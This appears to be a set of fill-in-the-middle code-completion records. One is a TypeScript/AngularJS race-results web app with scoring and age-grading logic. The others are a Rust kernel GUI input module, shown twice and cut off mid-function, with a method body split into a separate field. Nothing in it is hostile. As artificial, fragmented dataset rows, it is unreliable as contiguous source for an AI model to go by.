if (this.results) { return this.results; }
let events = await this.Events.list();
let users = await this.Users.list();
let divisions = await this.Divisions.list();
this.score(events);
console.log({events})
this.results = events;
return this.results;
}
score(events: MEvent[]) {
for (let event of events) {
for (let race of event.results) {
let divs = _.keyBy(race.divisions, d => d.name.toLowerCase());
race.times = _.orderBy(race.times, [t => t.percent_world_record, t => t.time_number, t => t.username], ['desc', 'asc', 'asc']);
let place = 1;
for (let time of race.times) {
if (time.time) {
time.place = place++;
let divname = time.division.toLowerCase();
divs[divname].athletes += 1;
if (divs[divname].athletes <= 5) {
time.points = time.place;
divs[divname].points += time.place;
}
}
else {
time.points = null;
}
}
race.divisions = _.orderBy(race.divisions, [d => d.athletes >= 5 ? -1 : 1, d => d.points]);
place = 1;
for (let div of race.divisions) {
if (div.athletes >= 5) {
div.place = place++;
} else {
div.note = "DQ (Not enough finishers)";
}
}
}
}
}
async getEventResults(name: string) {
await this.calculate();
return this.results.find(x => x.name.replace(/\s+/g, '').toLowerCase() == name.replace(/\s+/g, '').toLowerCase());
}
}
/**
* Default page calendar view
*/
class Calendar {
static $inject = ['$http', 'Events'];
events: Array<MEvent> = [];
constructor (public $http: angular.IHttpService, public Events: Events) {
this.init();
}
async init() {
this.events = [];
let evts = await this.Events.list();
for (let evt of evts) {
evt = _.clone(evt);
evt.date = moment(evt.date).format('MMM D, YYYY');
this.events.push(evt);
}
}
}
/**
* Main controller loaded at start
*/
class MainController {
public isMobile: boolean;
public autoplay: boolean;
public events: Array<MEvent> = [];
public next: MEvent;
public autoplayKey: string;
public lastState: string;
public crumbs: BreadCrumb[] = [];
static $inject = ['$http', '$location', '$timeout', '$state', 'Events', '$sce'];
constructor(public $http: angular.IHttpService,
public $location: angular.ILocationService,
public $timeout: angular.ITimeoutService,
public $state: ng.ui.IStateService,
public Events: Events,
public $sce: angular.ISCEService)
{
this.autoplayKey = 'autoplay' + moment().year();
this.autoplay = localStorage.getItem(this.autoplayKey) === null ? true : localStorage.getItem(this.autoplayKey) == 'true';
this.isMobile = isMobile();
this.init();
}
async init() {
let [evts, evt] = await Promise.all([this.Events.list(), this.Events.next()]);
this.events = evts;
this.next = <MEvent>{
name: evt.name.toUpperCase(),
date: moment(evt.date),
state: evt.state,
displayDate: moment(evt.date).format('MMM D, YYYY'),
submit: evt.submit,
live: false
};
this.countdown();
}
countdown() {
if (this.next) {
let now = moment();
let evt = moment(this.next.date);
if (now.format('YYYY-MM-DD') === evt.format('YYYY-MM-DD')) {
this.next.live = true;
} else if (this.next.submit) {
this.next.live = true;
} else {
let days = evt.diff(now, 'days');
this.next.days = days;
evt.subtract(days, 'days');
let hours = evt.diff(now, 'hours');
this.next.hours = hours;
evt.subtract(hours, 'hours');
let minutes = evt.diff(now, 'minutes');
this.next.minutes = minutes;
}
this.$timeout(() => this.countdown(), 1000 * 60);
} else {
this.$timeout(() => this.countdown(), 500);
}
}
getBreadcrumbs() {
if (this.$state.current.name === this.lastState) {
return this.crumbs;
}
this.lastState = this.$state.current.name;
this.crumbs = [];
if (this.lastState !== 'Calendar') {
this.crumbs = [
{name: 'Home', last: false, link: 'Calendar'},
{name: this.lastState, last: true}
];
} else {
this.crumbs = [
{name: 'Home', last: true}
];
}
return this.crumbs;
}
stopAutoplay() {
localStorage.setItem(this.autoplayKey, 'false');
this.autoplay = false;
}
startAutoplay() {
localStorage.setItem(this.autoplayKey, 'true');
this.autoplay = true;
}
shouldAutoplay() {
let ap = localStorage.getItem(this.autoplayKey);
return !(ap === 'false');
}
getThemeUrl() {
let ap = this.shouldAutoplay();
return this.$sce.trustAsResourceUrl(`https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/460111206&auto_play=${ap}&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true`);
}
}
/**
* Individual event controller for event results pages
*/
class EventController {
tab: string = 'results';
hasRelay: boolean = false;
event: MEvent;
static $inject = ['$http', '$state', '$timeout', '$location', '$anchorScroll',
'$stateParams', 'Events', 'Results'];
constructor(private $http: angular.IHttpService,
private $state: ng.ui.IStateService,
private $timeout: angular.ITimeoutService,
private $location: angular.ILocationService,
private $anchorScroll: angular.IAnchorScrollService,
private $params: ng.ui.IStateParamsService,
private Events: Events,
private Results: Results)
{
this.$anchorScroll.yOffset = 60;
this.init();
}
async init() {
if (this.$params.tab) {
this.tab = this.$params.tab;
}
let eventName = this.$state.current.name;
this.event = await this.Results.getEventResults(eventName);
console.log({event: this.event});
this.$timeout(this.$anchorScroll);
}
changeTab(tab: string) {
this.tab = tab;
this.$state.go(this.$state.current.name, {tab});
}
}
/**
* AgeService
* Manages age grading calculations. Defaults to no grade.
*/
interface Grade {
id: string;
event: string;
isRoad: boolean;
mf: Sex;
age: number;
factor: number;
}
type Sex = 'F'|'M';
class AgeService {
static GRADES: {[mfEventId: string]: {[age: number]: Grade}} = {};
static COLS = {
MFEVENTID : 0,
EVENTID: 1,
ISROAD: 2,
DISTANCE_KM: 3,
WORLD_RECORD_SEC: 4,
AGE_START: 5
};
static WORLD_RECORD = 'World Record';
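// Expected shape of each tab-separated line in age-grade.txt, as implied by COLS above and the
// parsing below (illustrative only; the real file may differ):
//   MFEventId  EventId  IsRoad  DistanceKm  WorldRecordSec  factor(age 6)  factor(age 7) ...
// Header lines whose first column is "Event" are skipped, and age factors are read starting at age 6.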
static parse(file: string) {
let COL = AgeService.COLS;
let lines = file.split('\n');
for (let line of lines) {
if (!line.trim()) { continue; }
let parts = line.split('\t');
if (parts[0] == 'Event') { continue; }
// set up base object
let grade: Partial<Grade> = {
event: parts[COL.EVENTID],
isRoad: parts[COL.ISROAD] == '1',
mf: <Sex>parts[COL.MFEVENTID].charAt(0)
};
let id = parts[COL.MFEVENTID];
if (!AgeService.GRADES[id]) { AgeService.GRADES[id] = {}; }
// assign world record
AgeService.GRADES[id][AgeService.WORLD_RECORD] = <Grade>Object.assign({record: parseFloat(parts[COL.WORLD_RECORD_SEC])});
// assign age groups
let START = COL.AGE_START;
for (let ii = START; ii < parts.length - 1; ii++) {
let age = ii + 1;
let factor = parseFloat(parts[ii]);
AgeService.GRADES[id][age] = <Grade>Object.assign({age, factor, id}, grade);
}
}
console.log(AgeService.GRADES)
}
ageGrade(event: string, age: number, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return seconds; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let mfEventId = `${sex}${event}`;
let gradedTime = seconds;
let factor = 1;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
if (mfEvent[age]) {
factor = mfEvent[age].factor;
gradedTime = seconds * factor;
}
}
console.log(`${username} ${mfEventId} age:${age} time:${seconds} factor:${factor} graded:${gradedTime}`)
return gradedTime;
}
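// Illustrative example (made-up numbers): a 25:00 5K is 1500 seconds; with an age factor of 0.92
// the age-graded time is 1500 * 0.92 = 1380 seconds, i.e. 23:00.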
percentGrade(event: string, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return 0; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let percent = 0;
let wr;
let mfEventId = `${sex}${event}`;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
wr = mfEvent[AgeService.WORLD_RECORD];
percent = wr.record / seconds;
}
console.log(`${username} ${mfEventId} time:${seconds} WR:${wr?.record} percent:${percent}`);
return percent;
}
}
/**
* TimeService
* Time calculations -> string to number / number to string
*/
class TimeService {
toString(time: number): string {
if (!time) { return null; }
let hours = Math.floor(time / (60 * 60));
time = time - (hours * 60 * 60);
let minutes = Math.floor(time / 60);
time = time - (minutes * 60);
let seconds = time.toFixed(1);
let secondsNum = time;
if (hours) {
return `${hours}:${_.padStart(minutes+'',2,'0')}:${(secondsNum < 10 ? '0' : '') + seconds}`;
} else {
return `${minutes}:${(secondsNum < 10 ? '0' : '') + seconds}`;
}
}
toNumber(time: string): number {
if (!time) { return null; }
let parts = time.split(':').map(t => parseFloat(t));
if (parts.length == 3) {
return parts[0]*60*60 + parts[1]*60 + parseFloat(''+parts[2]);
} else {
return parts[0]*60 + parseFloat(''+parts[1]);
}
}
}
function promiseFix($rootScope) {
// await fix -- runs a digest manually on await because it doesn't naturally
Promise = ((Promise) => {
const NewPromise = function (fn) {
const promise = new Promise(fn);
promise.then((value) => {
$rootScope.$applyAsync();
return value;
}, (err) => {
$rootScope.$applyAsync();
throw err;
});
return promise;
};
// Clone the prototype
NewPromise.prototype = Promise.prototype;
// Clone all writable instance properties
for (const propertyName of Object.getOwnPropertyNames(Promise)) {
const propertyDescription = Object.getOwnPropertyDescriptor(Promise, propertyName);
if (propertyDescription.writable) {
NewPromise[propertyName] = Promise[propertyName];
}
}
return NewPromise;
})(Promise) as any;
}
function preload($http, $stateRegistry, $urlRouter, Events: Events, ageSvc: AgeService, google: GoogleSvc) {
return google.load().then(() => {
return Promise.all([
Events.list()
.then(evts => {
for (let evt of evts) {
let state = {
name: evt.state,
templateUrl: `${BASE}event.html`,
controller: 'event',
url: evt.url + "?tab",
params: {
tab: {dynamic: true}
},
controllerAs: 'EC'
};
$stateRegistry.register(state);
}
// after registering states, listen on the router
$urlRouter.sync();
$urlRouter.listen();
}),
$http.get(`${BASE}age-grade.txt`)
.then(x => x.data)
.then(data => {
AgeService.parse(data);
})
]);
});
}
angular
.module('ar', ['ui.router'])
.config(['$stateProvider', '$sceDelegateProvider', '$urlRouterProvider', '$locationProvider', function ($sp, $sce, $url, $loc) {
$sce.resourceUrlWhitelist([
'self',
`${BASE}**`
]);
$url.deferIntercept();
$sp.state({
name: 'Calendar',
templateUrl: `${BASE}calendar.html`,
controller: 'calendar',
url: '/calendar',
controllerAs: 'CC'
});
$sp.state({
name: 'Leaderboard',
templateUrl: `${BASE}leaderboard.html`,
controller: 'leaderboard',
url: '/leaderboard',
controllerAs: 'LC'
});
$url.otherwise('/calendar');
}])
.run(['$rootScope', promiseFix])
.run(['$http', '$stateRegistry', '$urlRouter', 'Events', 'AgeService', 'Google', preload])
.service('Google', GoogleSvc)
.service('Events', Events)
.service('Users', Users)
.service('Divisions', Divisions)
.service('AgeService', AgeService)
.service('TimeService', TimeService)
.service('Results', Results)
.controller('calendar', Calendar)
.controller('main', MainController)
.controller('event', EventController)
.directive('fixedTop', ['$window', function ($window) {
return {
restrict: 'A',
link: function (scope, elem, attrs, ctrl) {
let $win = angular.element($window);
let fixed = parseInt(attrs.fixedTop) || 50;
$win.on('scroll', e => {
let width = Math.max(window.innerWidth, document.documentElement.clientWidth);
if (width < 550 || $window.pageYOffset < fixed) {
elem.css({position: 'relative', top: '' });
} else {
elem.css({position: 'relative', top: ($window.pageYOffset - fixed) + 'px' });
}
});
}
};
}])
.filter('percent', ['$filter', function($filter) {
return function(input, decimals = 1) {
return $filter('number')(input * 100, decimals) + '%';
};
}]);
| buildUsers | identifier_name |
mod.rs | // "Tifflin" Kernel
// - By John Hodge (thePowersGang)
//
// Core/gui/input/mod.rs
//! GUI input management
#[allow(unused_imports)]
use kernel::prelude::*;
use self::keyboard::KeyCode;
use core::sync::atomic::{Ordering,AtomicUsize,AtomicU8};
use kernel::sync::Mutex;
pub mod keyboard;
pub mod mouse;
#[derive(Debug)]
pub enum Event
{
KeyDown(keyboard::KeyCode),
KeyUp(keyboard::KeyCode),
KeyFire(keyboard::KeyCode),
Text([u8; 6]), // 6 bytes, as that can fit in a u64 with a 16-bit tag
MouseMove(u32,u32,i16,i16),
MouseDown(u32,u32,u8),
MouseUp(u32,u32,u8),
MouseClick(u32,u32, u8, u8),
}
struct ModKeyPair(AtomicUsize);
struct MouseCursor {
graphics_cursor: ::kernel::sync::Mutex<::kernel::metadevs::video::CursorHandle>,
}
struct InputChannel
{
//caps_active: AtomicBool, // Go DIAF capslock
shift_held: ModKeyPair,
ctrl_held: ModKeyPair,
alt_held: ModKeyPair,
//altgr: ModKeyPair, // AltGr is usually just one... but meh
last_key_pressed: AtomicU8,
//active_repeat: AtomicValue<u8>,
//repeat_start: Timestamp,
cursor: MouseCursor,
// TODO: Mutex feels too heavy, but there may be multiple mice on one channel
double_click_info: Mutex<MouseClickInfo>,
}
struct MouseClickInfo
{
button: u8,
count: u8,
time: ::kernel::time::TickCount,
x: u32,
y: u32,
}
//struct IMEState
//{
// ime_ofs: u8,
// ime_val: u32,
//}
/// Maximum time in kernel ticks between subsequent press/release events for a click/doubleclick
const DOUBLE_CLICK_TIMEOUT: u64 = 500; // 500ms
/// Maximum distance along any axis between press/release before a click is not registered
const MAX_CLICK_MOVE: u32 = 10;
static MAIN_INPUT: InputChannel = InputChannel::new();
pub fn init() {
//MAIN_INPUT.cursor.
}
fn get_channel_by_index(_idx: usize) -> &'static InputChannel {
&MAIN_INPUT
}
impl InputChannel
{
const fn new() -> InputChannel {
InputChannel {
shift_held: ModKeyPair::new(),
ctrl_held: ModKeyPair::new(),
alt_held: ModKeyPair::new(),
//altgr: ModKeyPair::new(),
cursor: MouseCursor::new(),
last_key_pressed: AtomicU8::new(KeyCode::None as u8),
double_click_info: Mutex::new(MouseClickInfo::new()),
}
}
pub fn handle_key(&self, key: keyboard::KeyCode, release: bool)
{
log_trace!("key={:?}, release={}", key, release);
match (release, key)
{
// Maintain key states
(false, KeyCode::RightShift) => self.shift_held.set_r(),
(false, KeyCode::LeftShift) => self.shift_held.set_l(),
(false, KeyCode::RightCtrl) => self.ctrl_held.set_r(),
(false, KeyCode::LeftCtrl) => self.ctrl_held.set_l(),
(false, KeyCode::RightAlt) => self.alt_held.set_r(),
(false, KeyCode::LeftAlt) => self.alt_held.set_l(),
(true, KeyCode::RightShift) => self.shift_held.clear_r(),
(true, KeyCode::LeftShift) => self.shift_held.clear_l(),
(true, KeyCode::RightCtrl) => self.ctrl_held.clear_r(),
(true, KeyCode::LeftCtrl) => self.ctrl_held.clear_l(),
(true, KeyCode::RightAlt) => self.alt_held.clear_r(),
(true, KeyCode::LeftAlt) => self.alt_held.clear_l(),
// Check for session change commands, don't propagate if they fired
// - 'try_change_session' checks for the required modifier keys and permissions
// TODO: Should this be handled by the `windows` module?
(false, KeyCode::Esc) => if self.try_change_session(0) { return ; },
(false, KeyCode::F1) => if self.try_change_session(1) { return ; },
(false, KeyCode::F2) => if self.try_change_session(2) { return ; },
(false, KeyCode::F3) => if self.try_change_session(3) { return ; },
(false, KeyCode::F4) => if self.try_change_session(4) { return ; },
(false, KeyCode::F5) => if self.try_change_session(5) { return ; },
(false, KeyCode::F6) => if self.try_change_session(6) { return ; },
(false, KeyCode::F7) => if self.try_change_session(7) { return ; },
(false, KeyCode::F8) => if self.try_change_session(8) { return ; },
(false, KeyCode::F9) => if self.try_change_session(9) { return ; },
(false, KeyCode::F10) => if self.try_change_session(10) { return ; },
(false, KeyCode::F11) => if self.try_change_session(11) { return ; },
(false, KeyCode::F12) => if self.try_change_session(12) { return ; },
_ => {},
}
let last_key = self.last_key_pressed.load(Ordering::Relaxed);
if !release {
self.last_key_pressed.store(key as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyDown(key));
}
// Handle fire and text events
if key.is_modifier()
{
// Only fire a modifier on key-up IF they were the last one pressed
// - This allows "Gui" (windows) to fire on key-up while still being used as a modifier
if release && last_key == key as u8
{
super::windows::handle_input( Event::KeyFire(key) );
}
}
else
{
// TODO: Support repetition (of the last non-modifier pressed)
if !release
{
super::windows::handle_input( Event::KeyFire(key) );
// TODO: Should only generate text if no non-shift modifiers are depressed
//if self.enable_input_translation {
let s = self.get_input_string(key);
if s.len() > 0 {
let mut buf = [0; 6];
buf[.. s.len()].clone_from_slice( s.as_bytes() );
super::windows::handle_input( Event::Text(buf) );
}
//}
}
}
// Send key combination to the active window (via the window subsystem)
if release {
self.last_key_pressed.store(KeyCode::None as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyUp(key));
}
}
pub fn handle_mouse_set(&self, norm_x: u16, norm_y: u16)
{
// Mouse movement, update cursor
let (dx,dy) = self.cursor.set_pos(norm_x, norm_y);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx as i16, dy as i16));
}
pub fn handle_mouse_move(&self, dx: i16, dy: i16)
{
// Mouse movement, update cursor
self.cursor.move_pos(dx as i32, dy as i32);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx, dy));
}
pub fn handle_mouse_btn(&self, btn: u8, release: bool)
{
let (x,y) = self.cursor.pos();
if release
{
// Released - check the double-click timer
if let Some(ev) = self.double_click_info.lock().check( x,y, btn )
{
super::windows::handle_input(/*self, */ev);
}
super::windows::handle_input(/*self, */Event::MouseUp(x, y, btn));
}
else
{
// Pressed - reset the double-click timer
self.double_click_info.lock().reset(x,y, btn);
super::windows::handle_input(/*self, */Event::MouseDown(x, y, btn));
}
}
fn shift(&self) -> bool {
self.shift_held.get()
}
fn upper(&self) -> bool {
self.shift()
}
fn get_input_string(&self, keycode: KeyCode) -> &str
{
macro_rules! shift { ($s:ident: $lower:expr, $upper:expr) => { if $s.shift() { $upper } else {$lower} }; }
macro_rules! alpha { ($s:ident: $lower:expr, $upper:expr) => { if $s.upper() { $upper } else {$lower} }; }
match keycode
{
KeyCode::A => alpha!(self: "a", "A"),
KeyCode::B => alpha!(self: "b", "B"),
KeyCode::C => alpha!(self: "c", "C"),
KeyCode::D => alpha!(self: "d", "D"),
KeyCode::E => alpha!(self: "e", "E"),
KeyCode::F => alpha!(self: "f", "F"),
KeyCode::G => alpha!(self: "g", "G"),
KeyCode::H => alpha!(self: "h", "H"),
KeyCode::I => alpha!(self: "i", "I"),
KeyCode::J => alpha!(self: "j", "J"),
KeyCode::K => alpha!(self: "k", "K"),
KeyCode::L => alpha!(self: "l", "L"),
KeyCode::M => alpha!(self: "m", "M"),
KeyCode::N => alpha!(self: "n", "N"),
KeyCode::O => alpha!(self: "o", "O"),
KeyCode::P => alpha!(self: "p", "P"),
KeyCode::Q => alpha!(self: "q", "Q"),
KeyCode::R => alpha!(self: "r", "R"),
KeyCode::S => alpha!(self: "s", "S"),
KeyCode::T => alpha!(self: "t", "T"),
KeyCode::U => alpha!(self: "u", "U"),
KeyCode::V => alpha!(self: "v", "V"),
KeyCode::W => alpha!(self: "w", "W"),
KeyCode::X => alpha!(self: "x", "X"),
KeyCode::Y => alpha!(self: "y", "Y"),
KeyCode::Z => alpha!(self: "z", "Z"),
KeyCode::SquareOpen => shift!(self: "[", "{"),
KeyCode::SquareClose => shift!(self: "]", "}"),
KeyCode::Backslash => shift!(self: "\\","|"),
KeyCode::Semicolon => shift!(self: ";", ":"),
KeyCode::Quote => shift!(self: "'", "\""),
KeyCode::Comma => shift!(self: ",", "<"),
KeyCode::Period => shift!(self: ".", ">"),
KeyCode::Slash => shift!(self: "/", "?"),
KeyCode::Kb1 => shift!(self: "1", "!"),
KeyCode::Kb2 => shift!(self: "2", "@"),
KeyCode::Kb3 => shift!(self: "3", "#"),
KeyCode::Kb4 => shift!(self: "4", "$"),
KeyCode::Kb5 => shift!(self: "5", "%"),
KeyCode::Kb6 => shift!(self: "6", "^"),
KeyCode::Kb7 => shift!(self: "7", "&"),
KeyCode::Kb8 => shift!(self: "8", "*"),
KeyCode::Kb9 => shift!(self: "9", "("),
KeyCode::Kb0 => shift!(self: "0", ")"),
KeyCode::Minus => shift!(self: "-", "_"),
KeyCode::Equals => shift!(self: "=", "+"),
KeyCode::Space => " ",
_ => "",
}
}
fn try_change_session(&self, target: usize) -> bool {
if self.is_master() && self.ctrl_held.get() && self.alt_held.get() {
super::windows::switch_active(target);
true
}
else {
false
}
}
fn is_master(&self) -> bool { true }
}
impl ModKeyPair {
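// Encoding sketch (inferred from the methods below): bit 0 tracks the left-hand key and bit 1 the
// right-hand key, so `get()` reports the modifier as held while either bit is set.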
const fn new() -> ModKeyPair {
ModKeyPair(AtomicUsize::new(0))
}
fn set_l(&self) |
fn set_r(&self) { self.0.fetch_or(2, Ordering::Relaxed); }
fn clear_l(&self) { self.0.fetch_and(!1, Ordering::Relaxed); }
fn clear_r(&self) { self.0.fetch_and(!2, Ordering::Relaxed); }
fn get(&self) -> bool {
self.0.load(Ordering::Relaxed) != 0
}
}
impl MouseCursor {
const fn new() -> MouseCursor {
MouseCursor {
graphics_cursor: ::kernel::sync::Mutex::new(::kernel::metadevs::video::CursorHandle::new()),
}
}
fn add_coord(cur: u32, d: i32) -> u32 {
if d < 0 {
u32::saturating_sub(cur, -d as u32)
}
else {
u32::saturating_add(cur, d as u32)
}
}
/// Set cursor position to normalised coordinates
fn set_pos(&self, norm_x: u16, norm_y: u16) -> (i32, i32) {
let mut lh = self.graphics_cursor.lock();
let pos = lh.get_pos();
let rect = match ::kernel::metadevs::video::get_display_for_pos(pos)
{
Ok(v) => v,
Err(v) => v,
};
let new_pos = ::kernel::metadevs::video::Pos {
x: rect.x() + ((rect.w() as u64 * norm_x as u64) >> 16) as u32,
y: rect.y() + ((rect.h() as u64 * norm_y as u64) >> 16) as u32,
};
lh.set_pos(new_pos);
(
(new_pos.x as i32 - pos.x as i32) as i32,
(new_pos.y as i32 - pos.y as i32) as i32,
)
}
fn move_pos(&self, dx: i32, dy: i32) {
let mut lh = self.graphics_cursor.lock();
let mut pos = lh.get_pos();
pos.x = Self::add_coord(pos.x, dx);
pos.y = Self::add_coord(pos.y, dy);
lh.set_pos(pos);
}
fn pos(&self) -> (u32,u32) {
let pos = self.graphics_cursor.lock().get_pos();
(pos.x, pos.y)
}
}
impl MouseClickInfo
{
const fn new() -> MouseClickInfo {
MouseClickInfo {
button: 0xFF, x: 0, y: 0,
time: 0,
count: 0,
}
}
fn clear(&mut self)
{
self.button = 0xFF;
}
fn reset(&mut self, x: u32, y: u32, button: u8)
{
self.button = button;
self.count = 0;
self.x = x;
self.y = y;
self.time = ::kernel::time::ticks();
}
fn check(&mut self, x: u32, y: u32, button: u8) -> Option<Event>
{
use kernel::lib::num::abs_diff;
if self.button != button {
self.clear();
None
}
else if (::kernel::time::ticks() - self.time) > DOUBLE_CLICK_TIMEOUT {
self.clear();
None
}
else if abs_diff(self.x, x) > MAX_CLICK_MOVE || abs_diff(self.y, y) > MAX_CLICK_MOVE {
self.clear();
None
}
else {
self.time = ::kernel::time::ticks();
self.x = x;
self.y = y;
if self.count < 0xFF {
self.count += 1;
}
Some( Event::MouseClick(x, y, button, self.count) )
}
}
}
| { self.0.fetch_or(1, Ordering::Relaxed); } | identifier_body |
mod.rs | // "Tifflin" Kernel
// - By John Hodge (thePowersGang)
//
// Core/gui/input/mod.rs
//! GUI input management
#[allow(unused_imports)]
use kernel::prelude::*;
use self::keyboard::KeyCode;
use core::sync::atomic::{Ordering,AtomicUsize,AtomicU8};
use kernel::sync::Mutex;
pub mod keyboard;
pub mod mouse;
#[derive(Debug)]
pub enum Event
{
KeyDown(keyboard::KeyCode),
KeyUp(keyboard::KeyCode),
KeyFire(keyboard::KeyCode),
Text([u8; 6]), // 6 bytes, as that can fit in a u64 with a 16-bit tag
MouseMove(u32,u32,i16,i16),
MouseDown(u32,u32,u8),
MouseUp(u32,u32,u8),
MouseClick(u32,u32, u8, u8),
}
struct ModKeyPair(AtomicUsize);
struct MouseCursor {
graphics_cursor: ::kernel::sync::Mutex<::kernel::metadevs::video::CursorHandle>,
}
struct InputChannel
{
//caps_active: AtomicBool, // Go DIAF capslock
shift_held: ModKeyPair,
ctrl_held: ModKeyPair,
alt_held: ModKeyPair,
//altgr: ModKeyPair, // AltGr is usually just one... but meh
last_key_pressed: AtomicU8,
//active_repeat: AtomicValue<u8>,
//repeat_start: Timestamp,
cursor: MouseCursor,
// TODO: Mutex feels too heavy, but there may be multiple mice on one channel
double_click_info: Mutex<MouseClickInfo>,
}
struct MouseClickInfo
{
button: u8,
count: u8,
time: ::kernel::time::TickCount,
x: u32,
y: u32,
}
//struct IMEState
//{
// ime_ofs: u8,
// ime_val: u32,
//}
/// Maximum time in kernel ticks between subsequent press/release events for a click/doubleclick
const DOUBLE_CLICK_TIMEOUT: u64 = 500; // 500ms
/// Maximum distance along any axis between press/release before a click is not registered
const MAX_CLICK_MOVE: u32 = 10;
static MAIN_INPUT: InputChannel = InputChannel::new();
pub fn init() {
//MAIN_INPUT.cursor.
}
fn get_channel_by_index(_idx: usize) -> &'static InputChannel {
&MAIN_INPUT
}
impl InputChannel
{
const fn new() -> InputChannel {
InputChannel {
shift_held: ModKeyPair::new(),
ctrl_held: ModKeyPair::new(),
alt_held: ModKeyPair::new(),
//altgr: ModKeyPair::new(),
cursor: MouseCursor::new(),
last_key_pressed: AtomicU8::new(KeyCode::None as u8),
double_click_info: Mutex::new(MouseClickInfo::new()),
}
}
pub fn handle_key(&self, key: keyboard::KeyCode, release: bool)
{
log_trace!("key={:?}, release={}", key, release);
match (release, key)
{
// Maintain key states
(false, KeyCode::RightShift) => self.shift_held.set_r(),
(false, KeyCode::LeftShift) => self.shift_held.set_l(),
(false, KeyCode::RightCtrl) => self.ctrl_held.set_r(),
(false, KeyCode::LeftCtrl) => self.ctrl_held.set_l(),
(false, KeyCode::RightAlt) => self.alt_held.set_r(),
(false, KeyCode::LeftAlt) => self.alt_held.set_l(),
(true, KeyCode::RightShift) => self.shift_held.clear_r(),
(true, KeyCode::LeftShift) => self.shift_held.clear_l(),
(true, KeyCode::RightCtrl) => self.ctrl_held.clear_r(),
(true, KeyCode::LeftCtrl) => self.ctrl_held.clear_l(),
(true, KeyCode::RightAlt) => self.alt_held.clear_r(),
(true, KeyCode::LeftAlt) => self.alt_held.clear_l(),
// Check for session change commands, don't propagate if they fired
// - 'try_change_session' checks for the required modifier keys and permissions
// TODO: Should this be handled by the `windows` module?
(false, KeyCode::Esc) => if self.try_change_session(0) { return ; },
(false, KeyCode::F1) => if self.try_change_session(1) { return ; },
(false, KeyCode::F2) => if self.try_change_session(2) { return ; },
(false, KeyCode::F3) => if self.try_change_session(3) { return ; },
(false, KeyCode::F4) => if self.try_change_session(4) { return ; },
(false, KeyCode::F5) => if self.try_change_session(5) { return ; },
(false, KeyCode::F6) => if self.try_change_session(6) { return ; },
(false, KeyCode::F7) => if self.try_change_session(7) { return ; },
(false, KeyCode::F8) => if self.try_change_session(8) { return ; },
(false, KeyCode::F9) => if self.try_change_session(9) { return ; },
(false, KeyCode::F10) => if self.try_change_session(10) { return ; },
(false, KeyCode::F11) => if self.try_change_session(11) { return ; },
(false, KeyCode::F12) => if self.try_change_session(12) { return ; },
_ => {},
}
let last_key = self.last_key_pressed.load(Ordering::Relaxed);
if !release {
self.last_key_pressed.store(key as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyDown(key));
}
// Handle fire and text events
if key.is_modifier()
{
// Only fire a modifier on key-up IF they were the last one pressed
// - This allows "Gui" (windows) to fire on key-up while still being used as a modifier
if release && last_key == key as u8
{
super::windows::handle_input( Event::KeyFire(key) );
}
}
else
{
// TODO: Support repetition (of the last non-modifier pressed)
if !release
{
super::windows::handle_input( Event::KeyFire(key) );
// TODO: Should only generate text if no non-shift modifiers are depressed
//if self.enable_input_translation {
let s = self.get_input_string(key);
if s.len() > 0 {
let mut buf = [0; 6];
buf[.. s.len()].clone_from_slice( s.as_bytes() );
super::windows::handle_input( Event::Text(buf) );
}
//}
}
}
// Send key combination to the active window (via the window subsystem)
if release {
self.last_key_pressed.store(KeyCode::None as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyUp(key));
}
}
pub fn handle_mouse_set(&self, norm_x: u16, norm_y: u16)
{
// Mouse movement, update cursor
let (dx,dy) = self.cursor.set_pos(norm_x, norm_y);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx as i16, dy as i16));
}
pub fn handle_mouse_move(&self, dx: i16, dy: i16)
{
// Mouse movement, update cursor
self.cursor.move_pos(dx as i32, dy as i32);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx, dy));
}
pub fn handle_mouse_btn(&self, btn: u8, release: bool)
{
let (x,y) = self.cursor.pos();
if release
{
// Released - check the double-click timer
if let Some(ev) = self.double_click_info.lock().check( x,y, btn )
{
super::windows::handle_input(/*self, */ev);
}
super::windows::handle_input(/*self, */Event::MouseUp(x, y, btn));
}
else
{
// Pressed - reset the double-click timer
self.double_click_info.lock().reset(x,y, btn);
super::windows::handle_input(/*self, */Event::MouseDown(x, y, btn));
}
}
fn shift(&self) -> bool {
self.shift_held.get()
}
fn upper(&self) -> bool {
self.shift()
}
fn get_input_string(&self, keycode: KeyCode) -> &str
{
macro_rules! shift { ($s:ident: $lower:expr, $upper:expr) => { if $s.shift() { $upper } else {$lower} }; }
macro_rules! alpha { ($s:ident: $lower:expr, $upper:expr) => { if $s.upper() { $upper } else {$lower} }; }
match keycode
{
KeyCode::A => alpha!(self: "a", "A"),
KeyCode::B => alpha!(self: "b", "B"),
KeyCode::C => alpha!(self: "c", "C"),
KeyCode::D => alpha!(self: "d", "D"),
KeyCode::E => alpha!(self: "e", "E"),
KeyCode::F => alpha!(self: "f", "F"),
KeyCode::G => alpha!(self: "g", "G"),
KeyCode::H => alpha!(self: "h", "H"),
KeyCode::I => alpha!(self: "i", "I"),
KeyCode::J => alpha!(self: "j", "J"),
KeyCode::K => alpha!(self: "k", "K"),
KeyCode::L => alpha!(self: "l", "L"),
KeyCode::M => alpha!(self: "m", "M"),
KeyCode::N => alpha!(self: "n", "N"),
KeyCode::O => alpha!(self: "o", "O"),
KeyCode::P => alpha!(self: "p", "P"),
KeyCode::Q => alpha!(self: "q", "Q"),
KeyCode::R => alpha!(self: "r", "R"),
